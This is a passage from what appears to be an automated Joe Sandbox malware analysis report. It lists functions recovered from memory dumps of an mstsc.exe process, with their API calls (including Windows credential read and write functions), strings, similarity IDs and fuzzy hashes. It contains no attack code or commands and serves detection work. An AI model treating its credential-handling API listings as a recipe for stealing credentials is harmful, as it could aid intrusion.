                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                                                    • Opcode ID: b83fb37f0dd41d0099ab651f7649cde5560e98e4f1b22fc096c33f6fea6179c6
                                                                                                                                                                                    • Instruction ID: 965281fc7eea20ba31160d3429bb883e37528cf055e4fb7d8812b57fb13de0b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: b83fb37f0dd41d0099ab651f7649cde5560e98e4f1b22fc096c33f6fea6179c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09F1F5B2D10209EFCF11EFD4C9809EEB7B9BF08304F25856AE605A7614E7349A45DF61
                                                                                                                                                                                    Function 0096795B Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 303libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,?,?,0096AFA8,?), ref: 009679A5
                                                                                                                                                                                    • SearchPathW.KERNEL32 ref: 009679D8
                                                                                                                                                                                    • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000), ref: 00967A16
                                                                                                                                                                                    • GetUserDefaultUILanguage.KERNEL32 ref: 00967A31
                                                                                                                                                                                    • GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?), ref: 00967AFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
                                                                                                                                                                                    • String ID: %s\%s$MUI
                                                                                                                                                                                    • API String ID: 1597595625-2651373239
                                                                                                                                                                                    • Opcode ID: 84867f6a7dc06fed7a2d23f7d10e0301e553b15678363c97ebd7f0bf5764fbb9
                                                                                                                                                                                    • Instruction ID: 1c219d28fa92e42cd0578c4c6fbd6a805e214a90ab7936d321c72ebb45212f50
                                                                                                                                                                                    • Opcode Fuzzy Hash: 84867f6a7dc06fed7a2d23f7d10e0301e553b15678363c97ebd7f0bf5764fbb9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01B1BAB1A142699BCF319BA4CC54BFEF37D9FC4348F0445E5E945A7281DA708EC48BA1
                                                                                                                                                                                    Function 0095D98A Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,00000081,?,?,?,00000000,00000000,?,0095D97E,00000081,?,?), ref: 0095DC34
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Proc$AddressFreeHandleLibraryModuleWindow
                                                                                                                                                                                    • String ID: ForwardMessageToControl failed$OnActivateApp failed$OnCancel failed$OnClose failed$OnConnectFailed failed$OnEraseBkgnd failed$OnMouseActivate failed$OnPaint failed$OnSize failed$OnStartViewer failed
                                                                                                                                                                                    • API String ID: 2574719336-1852076887
                                                                                                                                                                                    • Opcode ID: 1dc7fc29eb00ed693b1c0c8c1a58736bad0381ff2746f5fec95e0eba647969d7
                                                                                                                                                                                    • Instruction ID: ed1a77239947d86c098a25c3c64b33539efcb67b3cda5f152059c4ab6e9e5e71
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dc7fc29eb00ed693b1c0c8c1a58736bad0381ff2746f5fec95e0eba647969d7
                                                                                                                                                                                    • Instruction Fuzzy Hash: D291B23160A3446EDB3BCF56CC59F313BAAAB46356F18444CFE40964E2C663CA49EF52
                                                                                                                                                                                    Function 009608AA Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 256COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 009608CE
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00960A52
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00960A62
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00960A68
                                                                                                                                                                                    • CredDeleteW.ADVAPI32(?,00000002,00000000), ref: 00960A7B
                                                                                                                                                                                    • SHStrDupW.SHLWAPI(?,?), ref: 00960ACC
                                                                                                                                                                                    • CredWriteW.ADVAPI32(?,00000000), ref: 00960B4C
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00960B5A
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@CredFree$AddressDeleteErrorHandleLastLibraryLocalMessageModuleProcTraceWritememset
                                                                                                                                                                                    • String ID: SHStrDup failed$s_DeleteCredHelper failed$s_UnpackAuthBlob failed
                                                                                                                                                                                    • API String ID: 641574173-1857523022
                                                                                                                                                                                    • Opcode ID: fc1735ef6d3852a421aeff0e8ccce4358911c968cd5301352562d622d3fd5b94
                                                                                                                                                                                    • Instruction ID: ca390657f631933b2e36e1c1ce5f74529a29017c618af66941cd8fadb1528819
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc1735ef6d3852a421aeff0e8ccce4358911c968cd5301352562d622d3fd5b94
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9891C372614344AFDB29CF94D889F6B3BAAABC9350F15408DF544AB2A2C774CC80EF51
                                                                                                                                                                                    Function 00965C84 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 210libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000,00000000), ref: 00965C9B
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00965CC6
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00965CF5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageFamilyName), ref: 00965D02
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00965D2C
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00965D4F
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00965E1F
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0091396B,00000000,00000000), ref: 00965EEF
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00965EF9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$Library$??2@??3@AddressFreeLoadProc
                                                                                                                                                                                    • String ID: GetCurrentPackageFamilyName$kernel32.dll
                                                                                                                                                                                    • API String ID: 1625212921-3608959999
                                                                                                                                                                                    • Opcode ID: 21b4bd810e4d292ae23f155d3c2c41df2dbd78821d0e9922f2e92009bca37d71
                                                                                                                                                                                    • Instruction ID: 13632b0d140202362fe718cf25a27225c3bc130095ca8ce526c7d5fc5f5f3523
                                                                                                                                                                                    • Opcode Fuzzy Hash: 21b4bd810e4d292ae23f155d3c2c41df2dbd78821d0e9922f2e92009bca37d71
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F610671618740BFDB2A9F649859F273BAAAB49310F16004DF9419B1F2CB76CD80EF51
                                                                                                                                                                                    Function 0233822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsnlen
                                                                                                                                                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                                                    • API String ID: 3628947076-1387797911
                                                                                                                                                                                    • Opcode ID: aa3c59e26c3dbef485daf6f820adf8b56029e89a39a9256331c27ddbf488ff7c
                                                                                                                                                                                    • Instruction ID: fcf667a3d80e6ab0c3c0636ca8d4eed618be8af316b5ec3e253065218b1998bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa3c59e26c3dbef485daf6f820adf8b56029e89a39a9256331c27ddbf488ff7c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F41A376240208BAFB239AE1CC41FEEB7ADAF04758F004122FB05D6190D7B4DB548BA4
                                                                                                                                                                                    Function 0094C176 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(userenv.dll,?,00000000,00000000,0094C5A2), ref: 0094C1CD
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0094C1FC
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0094C228
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAppContainerRegistryLocation), ref: 0094C244
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0094C271
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0094C29D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0094C2BA
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0094C310
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$Library$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                                                                                                    • String ID: GetAppContainerRegistryLocation$phKey$userenv.dll
                                                                                                                                                                                    • API String ID: 1294741123-4274605286
                                                                                                                                                                                    • Opcode ID: dbf9bfe46a532d6501dff349a9b54a83c5655264aba93f8b0ea6e76b1cd9ca47
                                                                                                                                                                                    • Instruction ID: 808b0755fd249873d70ffafadd6768286c91758fadefa7f8995f8e1f1f3e4ac4
                                                                                                                                                                                    • Opcode Fuzzy Hash: dbf9bfe46a532d6501dff349a9b54a83c5655264aba93f8b0ea6e76b1cd9ca47
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6416DF3B163515FD3759FA49C48F262A89AB49354F05005AF840EB1B3CAE4CC40AF94
                                                                                                                                                                                    Function 0092E261 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 144COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsnicmp
                                                                                                                                                                                    • String ID: MRU0$MRU1$MRU2$MRU3$MRU4$MRU5$MRU6$MRU7$MRU8$MRU9
                                                                                                                                                                                    • API String ID: 1886669725-961220685
                                                                                                                                                                                    • Opcode ID: f5ef787cb48e93e670df78e0b85054644dfce0bfbb309a402131246451cdc76b
                                                                                                                                                                                    • Instruction ID: f968642b3fd05ec7475945a78931ba9ec84223829c69ea422237932592938a69
                                                                                                                                                                                    • Opcode Fuzzy Hash: f5ef787cb48e93e670df78e0b85054644dfce0bfbb309a402131246451cdc76b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9741B771A043146FE724EF64DC81FAB77EDEB88340F10843ABC95A7746C639EE458664
                                                                                                                                                                                    Function 0093F81E Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000033B8), ref: 0093F889
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000033B9), ref: 0093F89A
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000033BA), ref: 0093F8A8
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000033BD), ref: 0093F8F4
                                                                                                                                                                                    • EndDialog.USER32 ref: 0093F90D
                                                                                                                                                                                    • EndDialog.USER32 ref: 0093F98E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ButtonChecked$Dialog
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3363682351-0
                                                                                                                                                                                    • Opcode ID: 45427327f82da45f13a0b822739d0d00d2716000cb82424b0a1959ce1425c064
                                                                                                                                                                                    • Instruction ID: f995a8d6dfbd6866cf137e9b45579eaba2bbe9ca662f3c335b58aaf729eda37a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 45427327f82da45f13a0b822739d0d00d2716000cb82424b0a1959ce1425c064
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE41E471A04208BBDF169F14DC95FBA7B6AEB44310F148435FA05AB2B0CBB1DE50AF80
                                                                                                                                                                                    Function 009623D8 Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00962458
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0096245F
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00962474
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0096248D
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00962498
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 009624A6
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 009624D7
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 009624E0
                                                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 009624E7
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0096250D
                                                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00962514
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00962527
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Show$Enable
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2939132127-0
                                                                                                                                                                                    • Opcode ID: 47c7505fd4bf308a59c61d65294f476c5d79336cfbe852a03d4c72853565ee08
                                                                                                                                                                                    • Instruction ID: 53d9a97dcb5eff415246a747e90f0765c2cd61ce4987fda861e1357380695053
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47c7505fd4bf308a59c61d65294f476c5d79336cfbe852a03d4c72853565ee08
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A417D70A04A15FFDB249F25DD88B29BB79FB04351F114025F906676B0DB72ACA0DF91
                                                                                                                                                                                    Function 009302E0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 331COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • StringCchCopy failed, xrefs: 00930473
                                                                                                                                                                                    • IMsRdpClient5::get_DeviceCollection failed!, xrefs: 009303CE
                                                                                                                                                                                    • ;, xrefs: 009302F8
                                                                                                                                                                                    • QI for IMsRdpClientNonScriptable3 failed!, xrefs: 00930366
                                                                                                                                                                                    • IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 009306F9, 00930758
                                                                                                                                                                                    • DynamicDevices, xrefs: 00930568
                                                                                                                                                                                    • IMsRdpDeviceCollection::GetDeviceCount failed, xrefs: 0093041D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ;$DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDeviceCollection::GetDeviceCount failed$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
                                                                                                                                                                                    • API String ID: 0-4264136737
                                                                                                                                                                                    • Opcode ID: 82bdd4465ec2f84458f9b10f8338df3bbaa08ffe337245d4d36c83c200c4c343
                                                                                                                                                                                    • Instruction ID: 7da130a587a40ea5acd0706b8b59550fc33c7e56c582ef16072996342b26f4f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82bdd4465ec2f84458f9b10f8338df3bbaa08ffe337245d4d36c83c200c4c343
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1D16D30A042199FCB24DF15CC65BA97BAABFC5314F0586E8E449AB1A1CF719E81CFD0
                                                                                                                                                                                    Function 009612DE Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 248libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0096132F
                                                                                                                                                                                    • memset.MSVCRT ref: 00961349
                                                                                                                                                                                    • memset.MSVCRT ref: 00961364
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00901B90,?,00000208,00000002,?,?,?,?,?,?,?,00000000,00000000), ref: 00961436
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,00000000,cookie=), ref: 0096153E
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 00961560
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • cookie=, xrefs: 009614ED
                                                                                                                                                                                    • Failed to get the clx cookie, xrefs: 00961399
                                                                                                                                                                                    • No TEST DLL to load, so terminating CLX object, xrefs: 00961415
                                                                                                                                                                                    • Init() Error loading CLx DLL., xrefs: 00961475
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Library$AddressByteCharErrorFreeHandleLastLoadModuleMultiProcWide
                                                                                                                                                                                    • String ID: Failed to get the clx cookie$Init() Error loading CLx DLL.$No TEST DLL to load, so terminating CLX object$cookie=
                                                                                                                                                                                    • API String ID: 3214168845-1061671136
                                                                                                                                                                                    • Opcode ID: 41d2b60743c11383aa80d4cff0d27659f3cc0d51857419660bedb541dd63bca9
                                                                                                                                                                                    • Instruction ID: 8584846a6f0d13136d2f5be501325793cb67873c379da02a7b1e3067e9bc3534
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41d2b60743c11383aa80d4cff0d27659f3cc0d51857419660bedb541dd63bca9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691F471A143186FDB24DF64DC89FAA7BA9AF49310F080099F905A72A2DB70CE84DF55
                                                                                                                                                                                    Function 00948377 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 248memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CredFree.ADVAPI32(00000000,?,00000000,00000000), ref: 00948491
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 0094849C
                                                                                                                                                                                    • CredReadDomainCredentialsW.ADVAPI32(?,00000000,?,?), ref: 00948515
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000), ref: 0094851F
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 009485D5
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000), ref: 0094861E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$CredLocal$AddressAllocCredentialsDomainErrorHandleLastLibraryMessageModuleProcReadTrace_wcsicmp
                                                                                                                                                                                    • String ID: CredReadDomainCredentials$StringCbCopy$StringCchCopy$allocate memory for userName
                                                                                                                                                                                    • API String ID: 2989600279-4106186159
                                                                                                                                                                                    • Opcode ID: 89348b25dab3d1e58bd121d4a939cb424724a8e3e5eedfc4b3798fc26fd7c8d2
                                                                                                                                                                                    • Instruction ID: 368b340d335deb3a83bf0af297d28c90a658e14b58284fe2b4f49bbb9dc774b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89348b25dab3d1e58bd121d4a939cb424724a8e3e5eedfc4b3798fc26fd7c8d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1091B132A04329AFCB65DF58DC88FAA7BE9AB49304F0600D9E504A7272DB70DD81DF45
                                                                                                                                                                                    Function 022E13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
